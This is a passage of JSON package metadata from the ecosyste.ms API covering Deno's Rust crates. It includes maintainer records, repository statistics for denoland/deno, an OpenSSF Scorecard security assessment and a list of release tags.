yste.ms/api/v1/registries/crates.io/packages/deno_cron/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cron/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2023-11-02T00:07:04.506Z","updated_at":"2023-11-02T00:07:04.506Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-11-10T21:47:54.165Z","updated_at":"2023-11-10T21:47:54.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":12939304,"name":"deno_inspector_server","ecosystem":"cargo","description":"Inspector server for Deno runtime","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":32,"first_release_published_at":"2026-01-22T20:07:04.297Z","latest_release_published_at":"2026-08-27T15:21:26.687Z","latest_release_number":"0.32.0","last_synced_at":"2026-09-07T22:56:27.031Z","created_at":"2026-01-28T00:26:22.341Z","updated_at":"2026-09-07T22:56:27.032Z","registry_url":"https://crates.io/crates/deno_inspector_server/","install_command":"cargo install deno_inspector_server","documentation_url":"https://docs.rs/deno_inspector_server/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776